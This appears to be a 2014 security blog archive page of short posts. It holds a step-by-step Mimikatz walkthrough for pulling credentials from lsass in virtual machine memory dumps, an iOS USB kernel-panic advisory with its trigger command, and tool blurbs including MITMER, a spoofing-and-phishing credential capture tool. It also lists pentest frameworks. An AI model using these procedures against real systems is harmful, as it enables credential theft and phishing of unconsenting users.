May 31, 2014

Howto: Mimikatz Against Virtual Machine Memory Part 1 By carnal0wnage

1. Copy vmem/vmsn from host

2. Use moonsols bin2dmp to convert it into a dmp file.
# Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp

3. Load the dmp file into windbg

4. run .symfix and .reload
kd> .symfix
kd> .reload

5. Load the mimilib.dll file
kd> .load C:\users\user\desktop\mimilib.dll

6. Find the lsass process
kd> !process 0 0 lsass.exe

7. switch to the lsass context fffffa800dba26d0 in this case
kd> .process /r /p fffffa800dba26d0

8. Load mimikatz
kd> !mimikatz

9. Done 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Vidoes: Digital Forensic - Technique and Tools @Mahidol University audio record file

In 30/05/2014, I go to Digital Forensic seminar at Mahidol University. This post is the audio record file from that seminar.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 30, 2014

Tools: OWASP OWTF, Offensive (Web) Testing Framework

OWASP OWTF, Offensive (Web) Testing Framework is an OWASP+PTES-focused try to unite great tools and make pen testing more efficient, written mostly in Python. The purpose of this tool is to automate the manual, uncreative part of pen testing: For example, spending time trying to remember how to call “tool X”, parsing results of “tool X” manually to feed “tool Y”, etc.

By reducing this burden the authors hope pen testers will have more time to:
  • See the big picture and think out of the box
  • More efficiently find, verify and combine vulnerabilities
  • Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
  • Perform more tactical/targeted fuzzing on seemingly risky areas
  • Demonstrate true impact despite the short timeframes we are typically given to test.
Some features like the passive and semi_passive test separation may also assist pen testers wishing to go the extra mile to get a head start and maybe even legitimately start report writing or preparing attacks before they are given the green light to test.
The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience. Please share your tests with the community! :)
This tool is however not a silverbullet and will only be as good as the person using it: Understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.


  • OWASP Testing Guide-oriented: owtf will try to classify the findings as closely as possible to the OWASP Testing Guide.
  • Report updated on the fly: As soon as each plugin finishes or sometimes before (i.e. after each vulnerability scanner finishes).
  • “Scumbag spidering”: Instead of implementing yet another spider (a hard job), owtf will scrub the output of all tools/plugins run to gather as many URLs as possible. This is somewhat “cheating” but tremendously effective since it combines the results of different tools, including several tools that perform brute forcing of files and directories.
  • Resilience: If one tool crashes owtf will move on to the next tool/test, saving the partial output of the tool until it crashed.
  • Easy to configure: config files are easy to read and modify.
  • Easy to run: No strange parameters, DB setup requirements, libraries, complex dependencies, etc.
  • Full control of what tests to run, interactivity and hopefully easy to follow examples and help :)
  • Easy to review transaction logs and plain text files with URLs, simple for scripting.
  • Basic Google Hacking without (annoying) API Key requirements via “blanket searches”, trying a bunch of operators at once, you can then narrow the search down if you find something interesting.
  • Easy to extract data from the database to parse or pass to other tools: They are all text files.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: ByWaf - Web Application Penetration Testing Framework

ByWaf is a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

....____           _       __            ____
.../ __ )   __  __| |     / /  ____ _   / __/
../ __  |  / / / /| | /| / /  / __ `/  / /_  
./ /_/ /  / /_/ / | |/ |/ /  / /_/ /  / __/  
/_____/   \__, /  |__/|__/   \__,_/  /_/     
The Bywaf application is built on Python’s built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers commandline editing with readline, including automatic tab completion of commands, command options and filenames.
Bywaf contains a sub-classed version of Cmd called Wafterpreter, which adds some important additions, including:
  • Loading and selecting plugins.
  • Getting and setting global and per-plugin options.
  • Additional methods exposing functionality to the plugins.
  • Backgrounding jobs, ending running jobs and querying job status.
  • Loading scripts from the the command-line or within the interpreter.
  • Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:
The Wafterpreter API encompasses methods used by both the plugins as well as the Wafterpreter’s own methods; this allows for plugins to refining its behavior by assigning their own methods in their place.
Utility methods are time-saving shortcuts; while the API methods are the preferred way to change the interpreter’s behavior and to perform queries for jobs.
  • filename_completer(): a utility method and API that when given a set of starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. This parameters to this method are supplied to completion methods, which can in turn pass them to this method.
  • get_job(): this utility method retrieves a Futures instace from the Wafterpreter’s internal list of completed and running jobs, given its job ID. This is useful in querying information about individual jobs (see do_kill() for an example).
  • finished_job_callback(): This overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
  • set_prompt(): an API method for setting the prompt to reflect a new plugin name.
  • get_history_item(): an API method returning the command history.
  • save_history(): an API method for saving the command history to a file.
  • load_history(): an API method for loading the command history from a file.
  • clear_history(): an API method for clearing the command history.
  • load_module(): a private low-level method for loading modules. Gets called by do_use(). There should not be a reason for its use outside that method.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 29, 2014

Tools: FuzzAP - Obfuscating wireless networks

A python script for obfuscating wireless networks
''' Warning: I am not a programmer by trade, nor would I consider myself one
The common SSID list was pulled from The OUI vendor list was parsed from for well known vendors (netgear, cisco, linksys, d-link, atheros, ralink, apple)
This idea was created based off of Black Alchemy's FakeAP and Pettinger's airraid Some logic for parsing required info from packets was taken from Leandro Meiners ( at Core Security Technology's Power-Saving DoS script


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: iOS 7 arbitrary code execution in kernel mode

 Vulnerability Summary

 Title             iOS 7 arbitrary code execution in kernel mode
 Release Date      14 March 2014
 Reference         NGS00596
 Discoverer        Andy Davis 
 Vendor            Apple
 Vendor Reference  600217059
 Systems Affected  iPhone 4 and later, iPod touch (5th generation) and later, 
                   iPad 2 and later
 CVE Reference     CVE-2014-1287
 Risk              High
 Status            Fixed

 Resolution Timeline

 Discovered        26 September 2013
 Reported          26 September 2013
 Released          26 September 2013
 Fixed             10 March 2014
 Published         14 March 2014

 Vulnerability Description 

 When a specific value is supplied in USB Endpoint descriptor for a HID device 
 the Apple device kernel panics and reboots

 Technical Details

 The bug can be triggered using umap (
 as follows:

 sudo python3 ./ -P /dev/ttyUSB0 -s 09:00:00:E:46


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Webfwlog Firewall Log Analyzer

Webfwlog is a flexible web-based firewall log analyzer and reporting tool. It supports standard system logs for linux, FreeBSD, OpenBSD, NetBSD, Solaris, Irix, OS X, etc. as well as Windows XP®. Supported log file formats are netfilter, ipfilter, ipfw, ipchains and Windows XP®. Webfwlog also supports logs saved in a database using the ULOG or NFLOG targets of the linux netfilter project, or any other database logs mapped with a view to the ulogd schema. Versions 1 and 2 of ulogd database schemas are supported.
Webfwlog fully supports IPv6 for database logs, and netfilter and ipfilter system logs.  


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 27, 2014

Tools: Apps for pentesting with your Android device

Basic Network Tools
- Terminal Emulator
- Port Scanners
- LAN/Network Scanner - Fing, Network Discovery
- TCP/UDP/Socket Clients - TCP Socket, UDP Sender, Socket Protocol
- Wifi Scanners - Wifi Analyser
- RDP/VNC - PacketCloud, Teamviewer, bVNC
- Service Clients - AndFTP, AndSMB, ConnectBot
- MAC Address Spoofing - Mac Address Ghost
- Package Manager - BotBrew

LAN Attack Tools
- Session Hijacking - DroidSheep
- Sniffer - tPacketCapture, Shark For Root/Shark Native, Shark Reader, PacketShark, Intercepter-NG(Have sslstriping options)

Pentest Suites
- Netsploit
- dSploit

Web Pentest
- SQL Injection - DroidSQLi, SQLMapChik

- OpenVPN Installer, OpenVPN Settings
- OrBot/OrWeb - Tor For Android

Source: Presentation "Pentesting Apps for your Android device" By Michael Palumbo.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 26, 2014

Tools: MITMER- MITM Testing Tool

Securing the traffic in your network is important to prevent MITM attack that can be used to sniff sensitive information on your network. Some users may require to open sensitive portals of the office to make their work remotely without verifying the security of the network used. if you need to use non trusted network you should enable the VPN to make sure that all your traffic goes encrypted.
On the other hand if you decided to run a penetration testing on network then you can use several tools that allows to conduct Man in the middle attack testing and one of them is MITMER. the tool allows to have the following:
  • MITM attack on a specific host or all LAN hosts.
  • Show HTTP and DNS activity of attacked hosts.
  • Fake DNS queries asking about some website and redirects them to your PC.
  • Covert that website into a fake page and host it on your PC.
  • Reveal entered credentials into that fake page.
The tool is written in python using Scapy and allows to run ARP or DNS spoofing to redirect users to phishing website and have their credential  for GMAIL, Twitter, Facebook or other online service.
you can download the tool from this website:


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.